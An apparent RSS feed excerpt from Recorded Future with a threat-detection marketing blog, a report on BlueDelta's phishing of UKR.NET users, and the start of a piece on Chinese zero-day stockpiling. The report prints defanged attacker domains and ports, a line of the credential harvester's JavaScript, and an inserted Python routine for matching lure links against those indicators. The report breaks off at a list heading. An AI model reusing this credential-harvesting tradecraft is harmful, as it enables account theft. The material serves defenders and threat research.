            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_13d33e30a4d6ff2bf805413e36ff4532517bc417e.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Digital Threat Detection Tools & Best Practices]]></title>
            <link>https://www.recordedfuture.com/blog/digital-threat-detection</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/digital-threat-detection</guid>
            <pubDate>Mon, 22 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Explore digital threat detection tools and learn best practices to identify, analyze, and neutralize digital threats before they impact your business.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li><strong>Digital threats now originate far beyond the perimeter.</strong> Identity exposure, brand impersonation, and attacker coordination across the open, deep, and dark webs create risks that traditional tools cannot detect early enough.</li>
          <li><strong>Context is the foundation of effective detection.</strong> Raw alerts and isolated indicators offer little clarity. Real-time intelligence turns noise into actionable insight.</li>
          <li><strong>Modern digital threat detection (DTD) requires visibility across the external digital environment.</strong> The earliest warning signs of ransomware, credential theft, and phishing campaigns appear long before internal alerts fire.</li>
          <li><strong>Analysts need automation to keep pace.</strong> High alert volumes and false positives overwhelm SOC teams. Automated enrichment, correlation, and prioritization significantly reduce investigation time and alert fatigue.</li>
          <li><strong>Recorded Future operationalizes intelligence at enterprise scale.</strong> The Intelligence GraphⓇ, Digital Risk Protection, and deep SIEM/SOAR/EDR integrations deliver immediate context, organization-specific visibility, and unified detections, improving time-to-detect, time-to-contain, and overall resilience.</li>
        </ul>
        <h2>Why Digital Threat Detection Requires a New Approach</h2>
        <p>Today’s cyber threats evolve too quickly and appear across too many digital touchpoints for isolated tools or static detection rules to keep up. SOC teams must contend with:</p>
        <ul>
          <li>High alert volumes from SIEM, EDR, cloud telemetry, identity systems, and external sources.</li>
          <li>Evolving adversary techniques, including automated attacks and infrastructure that changes by the hour.</li>
          <li>Expanding attack surfaces driven by SaaS adoption, third-party dependencies, social platforms, and cloud-native architectures.</li>
          <li>Alert fatigue from manually sifting through noise to find high-risk signals.</li>
        </ul>
        <p>As a result, organizations often struggle to distinguish meaningful threats from the constant noise of daily security events.</p>
        <p>Digital threat detection (DTD) addresses this challenge by shifting focus from isolated internal signals to continuous identification, analysis, and prioritization of threats across an organization’s entire digital ecosystem. Unlike traditional perimeter-focused detection, which relies on firewalls, antivirus, and static rules, DTD recognizes that modern threats originate from external infrastructure, supply chains, cloud environments, identities, brand assets, and the open web.</p>
        <p>The shift from reactive, point-in-time monitoring toward a proactive, intelligence-led model gives defenders the context they need to understand not just what is happening, but why it’s happening and what to do next. This article will serve as a comprehensive guide for security professionals, defining DTD and exploring the essential tools, methodologies, and practices required to build a proactive and intelligent security program.</p>
        <h2>Understanding the Modern Digital Threat Landscape</h2>
        <p>To <a href="https://www.recordedfuture.com/blog/digital-risk-protection-overview">build an effective digital threat detection program</a>, security teams must understand where modern threats originate and how attackers operate.</p>
        <h3>Key Threat Vectors Beyond the Perimeter</h3>
        <h4>Leaked credentials and account takeover attempts (stolen identities)</h4>
        <p>Compromised identities are now the most common entry point for attackers. Credentials harvested from stealer logs, breach dumps, or phishing toolkits often circulate online long before defenders know they’re exposed.</p>
        <h4>Brand impersonation, domain spoofing, and phishing campaigns</h4>
        <p>Attackers increasingly weaponize an organization’s public presence and create look-alike domains, fraudulent social profiles, or cloned websites to exploit user trust. These impersonation campaigns often serve as the launchpad for credential harvesting, malware delivery, and social engineering operations.</p>
        <h4>Vulnerability exploitation and zero-day threats in the external attack surface</h4>
        <p>Public-facing assets such as web applications, cloud workloads, exposed services, and third-party integrations are constantly probed for misconfigurations and unpatched vulnerabilities.</p>
        <h4>Dark web chatter and early warning signs of planned ransomware or DDoS attacks</h4>
        <p>Long before a ransomware deployment or DDoS attack hits production systems, signals often surface in underground communities. Threat actors discuss tools, trade access, or signal interest in specific industries and regions.</p>
        <h2>Why an Intelligence-Driven Approach is Better</h2>
        <p>For years, security programs centered their detection efforts on internal activity: log anomalies, endpoint alerts, authentication failures, and other signals that only appear after an attacker is already inside the environment. This approach is inherently reactive. It reveals what is happening within your systems, but not what is forming outside your walls or who may be preparing to target you next.</p>
        <p>Digital threat detection reverses that model. Instead of waiting for internal symptoms of compromise, it looks outward at the behaviors, infrastructure, and intent of adversaries operating across the <a href="https://www.recordedfuture.com/blog/digital-risk-management-strategies">broader digital ecosystem</a>. This expanded perspective allows teams to identify threats earlier in the kill chain, sometimes before any malicious activity reaches corporate networks.</p>
        <p>The real advantage comes from context. Raw data on its own is ambiguous: an IP address, a file hash, a domain registration. With intelligence layered on top, those fragments become meaningful. Context exposes intent, and intent enables defenders to prioritize, escalate, or respond with precision rather than guesswork.</p>
        <h2>Essential Digital Threat Detection Tools and Technologies</h2>
        <p>Modern digital threat detection depends on a collection of tools that work together to surface early warning signals and provide the context you need to validate threats quickly.</p>
        <h3>Threat Intelligence Platforms: The Engines of Context</h3>
        <p>No human team can manually aggregate, cross-reference, and analyze the amount of threat data emerging across the web every minute. A modern threat intelligence platform automates this work, transforming massive volumes of raw, unstructured information into intelligence that analysts can act on immediately.</p>
        <p>Threat intelligence platforms collect data from a wide range of external sources and standardize it into a usable format. Sources include:</p>
        <ul>
          <li>Open web reporting</li>
          <li>Underground forums</li>
          <li>Dark web marketplaces</li>
          <li>Malware sandboxes</li>
          <li>Threat feeds</li>
          <li>Researcher data</li>
        </ul>
        <p>Once the data is normalized, the platform enriches it with context, such as:</p>
        <ul>
          <li>Relationships between indicators</li>
          <li>Associations with known threat actors</li>
          <li>Infrastructure reuse</li>
          <li>Activity targeting specific industries or regions</li>
        </ul>
        <p>This enrichment process turns isolated artifacts into a coherent picture of adversary behavior, revealing intent, relevance, and potential impact in ways raw data alone cannot.</p>
        <h3>Security Orchestration, Automation, and Response (SOAR)</h3>
        <p>While threat intelligence provides the context needed to understand potential risks, SOAR platforms help teams take action on that intelligence quickly and consistently. These tools automate routine tasks that would otherwise consume analyst time, ensuring that high-priority threats receive attention without delay.</p>
        <p>Key SOAR capabilities include:</p>
        <ul>
          <li><strong>Enriching alerts</strong> with additional context from internal systems (SIEM, EDR, IAM, cloud telemetry)</li>
          <li><strong>Blocking malicious indicators</strong> across firewalls, endpoints, cloud environments, and identity systems</li>
          <li><strong>Initiating takedown workflows</strong> for harmful domains or impersonation infrastructure</li>
          <li><strong>Coordinating actions</strong> across multiple security tools to ensure a unified response</li>
          <li><strong>Documenting each step</strong> of the investigation for reporting and compliance</li>
        </ul>
        <p>By automating the mechanics of response, SOAR platforms allow analysts to focus on higher-value decision making rather than repetitive execution, reducing dwell time and improving overall response efficiency.</p>
        <h3>Endpoint Detection and Response (EDR) &amp; Security Information and Event Management (SIEM) Integration</h3>
        <p>EDR and SIEM platforms provide the internal vantage point of a digital threat detection program.</p>
        <p>EDR monitors activity directly on endpoints, capturing details such as running processes, file modifications, and other behaviors that may indicate compromise on individual devices. SIEM systems, by contrast, collect and correlate logs from across the entire environment, including authentication systems, cloud services, applications, and network devices.</p>
        <p>Together, these tools create a continuous stream of telemetry that reveals what is happening inside the organization, from process activity and login events to cloud logs and network traffic. When this internal data is correlated with intelligence about adversary infrastructure, active campaigns, or malicious tooling observed in the wild, EDR and SIEM can separate routine activity from signs of actual threats.</p>
        <p>Modern platforms increasingly apply AI and machine learning to enhance this capability. Instead of relying solely on static signatures or predefined rules, they learn normal behavior across users and systems and identify subtle deviations that signal compromise.</p>
        <h2>Overcoming the Analyst’s Biggest Pain Points</h2>
        <p>Today’s threat landscape places enormous pressure on analysts. Internal alerts arrive faster than they can investigate them, and the earliest indicators of an attack often originate in places no traditional tool monitors.</p>
        <h3>The Drain of Alert Fatigue and False Positives</h3>
        <p>High alert volumes are a major driver of analyst burnout. Much of the day is spent triaging notifications with little context, forcing analysts to manually determine which events represent real threats and which are routine activity. The repetitive, high-stakes nature of this work is exhausting and increases the likelihood that critical signals will be missed.</p>
        <p>The only reliable way to cut through this noise is to improve the quality of context surrounding each alert. When telemetry is paired with intelligence that explains adversary intent, infrastructure, and behavior, analysts can immediately see which signals matter and which can be safely deprioritized.</p>
        <h3>The Blind Spots of External Risk</h3>
        <p>Much of the activity that signals an impending attack happens beyond the reach of traditional security monitoring. Early warning signs often surface on the deep and dark webs, in criminal marketplaces, inside closed forums, and across fast-moving social platforms.</p>
        <p>These external environments are frequently where the most actionable signals appear first. Credential dumps, access sales, discussions about targeting specific industries, and the creation of malicious infrastructure often occur long before any internal alert fires. Without insight into this external ecosystem, organizations are effectively blind to the earliest stages of an attack. And monitoring these spaces manually is nearly impossible at scale.</p>
        <h2>Recorded Future: Operationalizing Digital Threat Intelligence at Scale</h2>
        <p>Recorded Future’s approach to digital threat detection delivers real-time intelligence at enterprise scale, closing the visibility gaps that make modern detection so difficult and giving you the context you need, the moment you need it.</p>
        <h3>Real-Time Context from the Intelligence GraphⓇ</h3>
        <p><a href="https://www.recordedfuture.com/platform/intelligence-graph">The Intelligence GraphⓇ</a> addresses the fragmentation of global threat data, one of the most persistent challenges in modern security operations. Threat activity unfolds across millions of sources, including:</p>
        <ul>
          <li>Open web</li>
          <li>Dark web marketplaces</li>
          <li>Malware repositories</li>
          <li>Technical feeds</li>
          <li>Network telemetry</li>
          <li>Closed underground forums</li>
        </ul>
        <p>No analyst team could manually track, interpret, and connect this information at the speed attackers operate. The Intelligence GraphⓇ solves this problem by continuously indexing and analyzing this vast ecosystem in real time. It structures billions of data points into clear relationships among threat actors, infrastructure, malware families, vulnerabilities, and targeted industries. Because these connections are made automatically, the platform can deliver immediate, decision-ready context on any indicator.</p>
        <h3>Comprehensive Digital Risk Protection for External Threats</h3>
        <p>Real-time context helps analysts understand what a threat is and who is behind it. But detection isn’t only about interpreting indicators; it's also about discovering specific threats against your organization across the broader internet.</p>
        <p>Recorded Future’s Digital Risk Protection (DRP) solution focuses on the same external spaces where global threat activity occurs, but applies a different lens: it monitors those environments for anything tied to your brand, domains, executives, or employees. This targeted approach ensures you see early signals of impersonation, credential theft, or emerging attacks long before they reach your internal systems.</p>
        <h3>Accelerating Time-to-Action through Integrated Intelligence</h3>
        <p>Recorded Future accelerates detection and response by delivering high-fidelity intelligence directly into the tools analysts already rely on.</p>
        <p>An extensive ecosystem of pre-built integrations and flexible APIs connects directly with every major SIEM, SOAR, and EDR platform. These integrations feed enriched threat context, dynamic Risk Scores, and prioritized intelligence into the tools analysts already use.</p>
        <p>Collective InsightsⓇ adds a layer of visibility that other tools cannot provide. It consolidates detections from across your SIEM, EDR, SOAR, IAM, and other security platforms into a single view, then enriches them with high-fidelity Recorded Future intelligence.</p>
        <p>This approach connects internal alerts to one another and exposes relationships that would remain hidden when each tool operates in isolation. By identifying MITRE ATT&amp;CK® tactics, techniques and procedures (TTPs) and attributing malware, it surfaces attack patterns you can only see from an aggregated view.</p>
        <h3>Smarter, Faster Security Decisions</h3>
        <p>Recorded Future delivers the automated, contextual intelligence needed to identify risks the moment they emerge and empower teams to respond with confidence.</p>
        <p>By unifying internal telemetry with real-time global threat insight and organization-specific targeting data, the platform enables smarter prioritization, faster action, and dramatically less noise.</p>
        <p>These intelligence-driven workflows directly improve core detection metrics such as time-to-detect (TTD) and time-to-contain (TTC), giving organizations a measurable way to demonstrate progress and strengthen operational resilience.</p>
        <p>Strengthen your security program and move toward intelligence-driven operations with confidence. Explore how <a href="https://www.recordedfuture.com/use-case/digital-risk">Recorded Future</a> can support your Digital Threat Detection strategy.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_14639da492947ba40cd78b2b341750064fc2e01ca.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[BlueDelta’s Persistent Campaign Against UKR.NET]]></title>
            <link>https://www.recordedfuture.com/research/bluedeltas-persistent-campaign-against-ukrnet</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/bluedeltas-persistent-campaign-against-ukrnet</guid>
            <pubDate>Wed, 17 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Discover how Russia’s BlueDelta targets UKR.NET users with advanced credential-harvesting campaigns, evolving tradecraft, and multi-stage phishing techniques.]]></description>
            <content:encoded><![CDATA[
        <p><em>The analysis cut-off date for this report was July 30, 2025.</em></p>
        <h2>Executive Summary</h2>
        <p>Between June 2024 and April 2025, Recorded Future’s Insikt Group identified a sustained credential-harvesting campaign targeting users of UKR.NET, a widely used Ukrainian webmail and news service. The activity is attributed to the Russian state-sponsored threat group BlueDelta (also known as APT28, Fancy Bear, and Forest Blizzard). This campaign builds on BlueDelta’s earlier operations detailed in the May 2024 Insikt Group report “<a href="https://www.recordedfuture.com/research/grus-bluedelta-targets-key-networks-in-europe-with-multi-phase-espionage-camp">GRU’s BlueDelta Targets Key Networks in Europe with Multi-Phase Espionage Campaigns</a>,” which documented GRU-linked credential theft and espionage activity. While this campaign does not reveal specific targets, BlueDelta’s historical focus on credential theft to enable intelligence collection provides strong indicators of likely intent to collect sensitive information from Ukrainian users in support of broader GRU intelligence requirements.</p>
        <p>Insikt Group observed BlueDelta deploy multiple credential-harvesting pages themed as UKR.NET login portals. The group leveraged free web services, including Mocky, DNS EXIT, and later, proxy tunneling platforms such as ngrok and Serveo, to collect usernames, passwords, and two-factor authentication codes. BlueDelta distributed PDF lures containing embedded links to these credential-harvesting pages, likely to bypass automated email scanning and sandbox detections. The tools, infrastructure choices, and bespoke JavaScript used in this report are consistent with BlueDelta’s established tradecraft and have not been observed in use by other Russian threat groups.</p>
        <p>BlueDelta’s continued abuse of free hosting and anonymized tunneling infrastructure likely reflects an adaptive response to Western-led infrastructure takedowns in early 2024. The campaign highlights the GRU’s persistent interest in compromising Ukrainian user credentials to support intelligence-gathering operations amid Russia’s ongoing war in Ukraine.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>BlueDelta maintained a consistent focus on UKR.NET users, continuing its long-running credential-harvesting activity throughout 2024 and 2025.</li>
          <li>The group distributed malicious PDF lures that linked to credential-harvesting pages through embedded URLs, enabling it to evade common email filtering and sandbox detection techniques.</li>
          <li>BlueDelta transitioned from compromised routers to proxy tunneling platforms, such as ngrok and Serveo, to relay credentials and bypass CAPTCHA and two-factor authentication challenges.</li>
          <li>Activity between March and April 2025 revealed updates to BlueDelta’s multi-tier infrastructure, including new tier-three and previously unseen tier-four components, indicating increased operational layering and sophistication.</li>
          <li>The campaign demonstrates continued refinement of BlueDelta’s credential-theft operations, reflecting the GRU’s sustained focus on collecting Ukrainian user credentials for intelligence purposes.</li>
        </ul>
        <h2>Background</h2>
        <p>BlueDelta is a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Russian Federation’s Armed Forces (GRU). Also known as APT28, Fancy Bear, and Forest Blizzard, the group has conducted credential-harvesting and espionage operations for more than a decade. The activity detailed in this report aligns with previous BlueDelta campaigns tracked by Insikt Group and consistently attributed by multiple Western governments to the GRU.</p>
        <p>Since at least the mid-2000s, BlueDelta has conducted phishing and credential-theft operations against a wide range of targets, including government institutions, defense contractors, weapons suppliers, logistics firms, and policy think tanks. These efforts aim to collect credentials and intelligence relevant to Russia’s military operations and strategic interests. Previously reported activity focused on UKR.NET and other webmail services using fake login portals hosted on free web infrastructure and compromised routers to capture usernames, passwords, and authentication codes.</p>
        <h2>Technical Analysis</h2>
        <p>On June 14, 2024, Insikt Group identified a new BlueDelta credential harvesting page, themed as a UKR.NET login page, as shown in <strong>Figure 1</strong>. The page was hosted using the free API service Mocky, which BlueDelta used regularly for most of its credential harvesting pages throughout 2024.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1aedf1a1ebaf322a2b9cea5d91b9c34059f89d679.png?width=750&amp;format=png&amp;optimize=medium" width="1575" height="1189" />
        </p>
        <p><em><strong>Figure 1:</strong></em> <em>The credential harvesting page displayed a UKR.NET login page (Source: Recorded Future)</em></p>
        <p>The malicious UKR.NET page had very similar functionality to that previously <a href="https://www.recordedfuture.com/research/grus-bluedelta-targets-key-networks-in-europe-with-multi-phase-espionage-camp">observed</a> by Insikt Group. The page used JavaScript to exfiltrate credentials and relay CAPTCHA information to a fixed domain and high-port combination, <em>kfghjerrlknsm[.]line[.]pm[:]11962</em>, as shown in <strong>Figure 2</strong>.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_11071d6fe28c7569a9a99c22d79c151693b79be2a.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1312" height="1600" />
        </p>
        <p><em><strong>Figure 2:</strong></em> <em>UKR.NET credential capture page JavaScript (Source: Recorded Future)</em></p>
        <p>The <em>line[.]pm</em> apex domain is owned by the free hosting company DNS EXIT, which offers free subdomain hosting.</p>
        <p>At the time of analysis, the domain resolved to the IP address <em>18[.]157[.]68[.]73</em>, which is an Amazon Elastic Compute Cloud (EC2) instance suspected of being used by the globally distributed reverse proxy service ngrok. ngrok offers a free service that enables users to connect servers behind a firewall to a proxy server and expose that server to the internet without changing firewall rules. In this instance, the service is likely being abused by BlueDelta to mask the true location of its upstream infrastructure.</p>
        <p>The use of ngrok represents a notable change in BlueDelta’s infrastructure, as the threat group previously used compromised Ubiquiti routers to host Python scripts that captured credentials and handled 2FA and CAPTCHA challenges. This change is likely a response to efforts by the Federal Bureau of Investigation (FBI), National Security Agency (NSA), US Cyber Command, and international partners to dismantle BlueDelta's infrastructure <a href="https://media.defense.gov/2024/Feb/27/2003400753/-1/-1/0/CSA-Russian-Actors-Use-Routers-Facilitate-Cyber_Operations.PDF">in early 2024</a>.</p>
        <p>BlueDelta added new functionality to the page hosted on <em>kfghjerrlknsm[.]line[.]pm</em> to capture victim IP addresses using the free HTTP request and response API service HTTPBin, as shown in <strong>Figure 3</strong>.</p>
        <pre><code>var respIP=$.getJSON('hxxps://httpbin[.]org/ip');
</code></pre>
        <p><em><strong>Figure 3:</strong></em> <em>Credential harvest page JavaScript, used to capture the victim's IP address (Source: Recorded Future)</em></p>
        <p>Two additional credential harvesting pages were discovered in July and September 2024 that matched the configuration of the first page but used different Mocky URLs, with one of the pages configured to use a different port number. This is likely due to BlueDelta setting up a new ngrok tunnel.</p>
        <p>On September 13, 2024, Insikt Group identified a new UKR.NET credential harvesting page, which was again hosted on Mocky. For this page, BlueDelta exfiltrated credentials and relayed CAPTCHA information to the domain <em>5ae39a1b39d45d08f947bdf0ee0452ae[.]serveo[.]net</em>.</p>
        <p>The apex domain <em>serveo[.]net</em> is owned by Serveo, a company that offers free remote port forwarding services similar to ngrok.</p>
        <p>In October and November 2024, Insikt Group identified three new UKR.NET-themed credential harvesting pages. Again, these pages were hosted using Mocky and were constructed with similar JavaScript to the previously reported pages. However, in the latest pages, BlueDelta moved upstream credential capture and relay functionality back to ngrok, using the custom DNS EXIT domain <em>jkbfgkjdffghh[.]linkpc[.]net</em>, configured with two separate fixed high ephemeral ports: 10176 and 17461. At the time of analysis, the <em>linkpc[.]net</em> domain resolved to suspected ngrok IP address <em>3[.]67[.]15[.]169</em>.</p>
        <p>Additionally, BlueDelta added new first-stage redirection domains for two of the pages: <em>ukraine[.]html-5[.]me</em> and <em>ukrainesafe[.]is-great[.]org</em>. It is likely that the threat actors added this extra step to hide Mocky URLs in phishing emails. The apex domains <em>html-5[.]me</em> and <em>is-great[.]org</em> are owned by the free hosting company Byet Internet Services.</p>
        <p>On December 27, 2024, Insikt Group identified a new BlueDelta UKR.NET credential harvesting page hosted on the Mocky URL <em>run[.]mocky[.]io/v3/72fa0a52-6e6e-43ad-b1c2-4782945d6050</em>. The malicious UKR.NET page had very similar functionality to the previously detailed pages. The page used JavaScript to exfiltrate credentials and relay CAPTCHA information to the same DNS EXIT domain, with an updated fixed port, <em>jkbfgkjdffghh[.]linkpc[.]net:17461</em>, as shown in <strong>Figures 4 and 5</strong>.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1d3acfd7246af4bd0b054c43368a2c03afecd6e12.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1330" height="1600" />
        </p>
        <p><em><strong>Figure 4:</strong></em> <em>JavaScript functions and variables containing the linkpc[.]net domain (Source: Recorded Future)</em></p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_10c10db1d8d09ea494c21cd484e6f0e6adeccfc34.jpg?width=750&amp;format=jpg&amp;optimize=medium" width="1147" height="1600" />
        </p>
        <p><em><strong>Figure 5:</strong></em> <em>JavaScript code used to capture credentials (Source: Recorded Future)</em></p>
        <p>During the analysis of this credential harvesting page, Insikt Group detected over twenty linked PDF files, which BlueDelta likely sent to victims as phishing lures. The PDF lure document, as shown in <strong>Figure 6</strong>, informs the target of suspicious activity on their UKR.NET account and requests that they click a link to reset their password.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_15c6aeca393c16eb8df14a4a9b2d04fd98ce25d63.png?width=750&amp;format=png&amp;optimize=medium" width="809" height="482" />
        </p>
        <p><em><strong>Figure 6:</strong></em> <em>PDF lure used by BlueDelta to entice victims to click links leading to credential harvesting pages (Source: Recorded Future)</em></p>
        <p>Each of the PDFs included a hyperlink to a credential harvesting page. Most of these links were either shortened using link-shortening services or used a domain registered through a free hosting provider. Since 2023, BlueDelta has used the following link-shortening platforms:</p>
        <ul>
          <li>doads[.]org</li>
          <li>in[.]run</li>
          <li>t[.]ly</li>
          <li>tiny[.]cc</li>
          <li>tinyurl[.]com</li>
          <li>linkcuts[.]com</li>
        </ul>
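        <p>As an added illustration for defenders (not Insikt Group's code), the following Python triage routine checks links pulled from a lure against the infrastructure patterns described above: the listed link shorteners, the Byet apex domains used for first-stage redirection, Mocky hosting of the harvesting page itself, and the linkpc[.]net DNS EXIT relay on its fixed ports. The sample links, the refang helper, the tag names and the placeholder paths are constructed for this example; the two-label apex extraction is a simplification noted in the code.</p>

```python
"""Triage of links extracted from phishing lures against the BlueDelta
infrastructure patterns described in the article above.

Added example for defenders; not Insikt Group code. The host lists come from
the article (link shorteners, Byet apex domains, Mocky, the linkpc.net DNS
EXIT host and its fixed ports); the sample links are constructed here.
"""
import re
from urllib.parse import urlsplit

# Link-shortening services the article lists as used by BlueDelta since 2023.
SHORTENERS = {"doads.org", "in.run", "t.ly", "tiny.cc", "tinyurl.com", "linkcuts.com"}

# Free-hosting (Byet) apex domains named in the article as first-stage redirectors.
FREE_HOSTING_APEX = {"html-5.me", "is-great.org"}

# Hosting used for the credential harvesting pages themselves.
MOCKY_HOSTS = {"run.mocky.io"}

# Dynamic-DNS apex used for the ngrok credential relay, and its fixed high ports.
RELAY_APEX = {"linkpc.net"}
RELAY_PORTS = {10176, 17461}


def refang(text: str) -> str:
    """Turn report-style defanged notation ("hxxp", "[.]") back into a real URL."""
    text = text.replace("[.]", ".").replace("[:]", ":")
    return re.sub(r"^hxxp(s?)://", r"http\1://", text, flags=re.IGNORECASE)


def apex_of(host: str) -> str:
    """Registrable domain, approximated as the last two labels.

    Simplification: a public-suffix list would be needed for names such as
    example.co.uk; every indicator in the article is a two-label apex.
    """
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def classify_link(url: str) -> list[str]:
    """Return the infrastructure patterns a link matches (empty list = none).

    A lure URL can match more than one pattern (e.g. relay host plus known
    port), so a list of tags is returned rather than a single verdict.
    """
    parts = urlsplit(refang(url.strip()))
    host = (parts.hostname or "").lower()
    apex = apex_of(host)
    tags = []
    if host in SHORTENERS or apex in SHORTENERS:
        tags.append("link-shortener")
    if apex in FREE_HOSTING_APEX:
        tags.append("free-hosting-redirector")
    if host in MOCKY_HOSTS:
        tags.append("mocky-hosted-page")
    if apex in RELAY_APEX:
        tags.append("dyndns-relay")
        if parts.port in RELAY_PORTS:
            tags.append("known-relay-port")
    return tags


def triage_links(links):
    """Map each link to its matched patterns; unmatched links get an empty list."""
    return {link: classify_link(link) for link in links}


def suspicious_links(links):
    """Only the links that matched at least one pattern, in input order."""
    return [link for link, tags in triage_links(links).items() if tags]


# Constructed sample input: hosts are from the article, paths are placeholders.
SAMPLE_LINKS = [
    "https://tinyurl[.]com/EXAMPLE-lure",
    "hxxps://ukraine[.]html-5[.]me/EXAMPLE",
    "https://run[.]mocky[.]io/v3/EXAMPLE-uuid",
    "https://jkbfgkjdffghh[.]linkpc[.]net:17461/",
    "https://mail.example.com/reset",
]

if __name__ == "__main__":
    for link, tags in triage_links(SAMPLE_LINKS).items():
        print(f"{link:50} {', '.join(tags) or 'no match'}")
```

        <p>The routine accepts defanged input so indicators can be pasted straight from a report, and it tags the DNS EXIT host separately from its fixed port, so a change of port (as the article describes between campaigns) still surfaces the relay domain.</p>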
        <p>Alongside link-shortening services, BlueDelta has used free domains from the hosting providers InfinityFree and Byet Internet Services, or subdomains provided by the free blogging platform Blogger (formerly Blogspot), as a second tier of redirection in combination with the shortened links. The following apex domains have been used in BlueDelta campaigns since 2023:</p>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_11203fd322f018c8d0b5f9b3c85f34cb897128ad0.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[China’s Zero-Day Pipeline: From Discovery to Deployment]]></title>
            <link>https://www.recordedfuture.com/research/china-zero-day-pipeline</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/china-zero-day-pipeline</guid>
            <pubDate>Wed, 17 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[China is consolidating cyber power through zero-days. Explore how state control of vulnerabilities enables long-term strategic advantage.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <ul>
          <li>China’s observed use of zero-days has declined since 2023. However, it has expanded its capacity to discover and manage vulnerabilities, <strong>signaling a continued effort toward stockpiling exploits</strong> for strategic or military advantage.</li>
          <li>The Data Security Law (DSL) and Provisions on the Management of Network Product Security Vulnerabilities (RMSV) <strong>give the Chinese state first access and control over zero-days.</strong> Combined with government-backed competitions, incentives, and private contractors, this framework likely sustains one of the world’s largest reserves of exploitable vulnerabilities.</li>
          <li>The creation of the Information Support Force (ISF) and Cyberspace Force (CSF) signals China’s <strong>consolidation of cyber capabilities</strong>, likely enabling more effective offensive and defensive cyber operations, with vulnerabilities likely serving as a central resource.</li>
          <li>Defenders should adopt an “assume breach” posture and build for containment, implementing <strong>zero trust and layered defenses</strong> to limit attacker movement and impact after an exploit.</li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_15e000151ffba5a4ff78475507202df421f0d8641.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="957" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em>How China stockpiles vulnerabilities</em> <em>(Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>Analysis</h2>
        <h3>Zero-Days as Strategic Weapons</h3>
        <p>A zero-day is a previously unknown software flaw for which no patch exists at the time it is discovered or exploited. Once weaponized, it allows adversaries to gain access, escalate privileges, or execute remote commands. These capabilities are especially effective against perimeter and enterprise systems, where a successful compromise can provide initial access and allow attackers to maintain persistence and carry out further cyber actions.</p>
        <p>Choosing whether to disclose or keep a zero-day vulnerability is a strategic decision. Governments must balance public safety with the potential intelligence or military value of keeping the flaw secret. In the US, this process is guided by the <a href="https://trumpwhitehouse.archives.gov/sites/whitehouse.gov/files/images/External%20-%20Unclassified%20VEP%20Charter%20FINAL.PDF">Vulnerabilities Equities Process (VEP)</a>, which is designed to be transparent and generally favors disclosure to help maintain internet security.</p>
        <h3>China’s Vulnerability Management Regime</h3>
        <p>China’s vulnerability management system is <a href="https://www.atlanticcouncil.org/in-depth-research-reports/report/sleight-of-hand-how-china-weaponizes-software-vulnerability/">centralized</a> and led by the state. Its laws, incentives, and institutions work together to feed new exploits and technical capabilities directly to the government, turning software vulnerabilities into strategic assets under state control.</p>
        <ul>
          <li><strong>Mandatory Reporting</strong></li>
        </ul>
        <p>The RMSV (2021) <a href="https://www.chinalawtranslate.com/en/product-security-vulnerabilites/">requires</a> that all discovered vulnerabilities be reported to the Ministry of Industry and Information Technology (MIIT) within two days and prohibits disclosure to foreign entities. The <a href="http://www.npc.gov.cn/englishnpc/c2759/c23934/202112/t20211209_385109.html">Data Security Law</a> (DSL) and <a href="https://www.chinalawtranslate.com/en/national-intelligence-law-of-the-p-r-c-2017/#gsc.tab=0">National Intelligence Law</a> (NIL) further compel all individuals and organizations to support state security objectives, with strict penalties for non-compliance. Together, these laws grant Beijing first access and complete control over all newly discovered flaws.</p>
        <ul>
          <li><strong>Incentivizing Compliance</strong></li>
        </ul>
        <p>This legal framework is reinforced through financial and professional incentives. The <a href="https://www.cnnvd.org.cn/">China National Vulnerability Database of Information Security</a> (CNNVD), managed by the Ministry of State Security (MSS), <a href="https://nattothoughts.substack.com/p/chinas-vulnerability-research-whats">offers</a> researchers and firms monetary rewards, certificates, honorary titles, and preferential access to government contracts. This system encourages compliance by making vulnerability disclosure both mandatory and materially rewarding.</p>
        <ul>
          <li><strong>Talent Development and Recruitment Pipelines</strong></li>
        </ul>
        <p>China combines strict regulations with a well-organized system for developing cybersecurity talent. Competitions such as the Tianfu Cup, Matrix Cup, and QiangWang Cup serve as key recruitment and training platforms for the state’s cyber programs. The 2024 Matrix Cup’s <a href="https://nattothoughts.substack.com/p/chinas-vulnerability-research-whats">$2.75 million USD</a> prize pool, nearly twice that of Canada’s Pwn2Own, highlights the size of this investment.</p>
        <ul>
          <li><strong>Private Sector Relationships</strong></li>
        </ul>
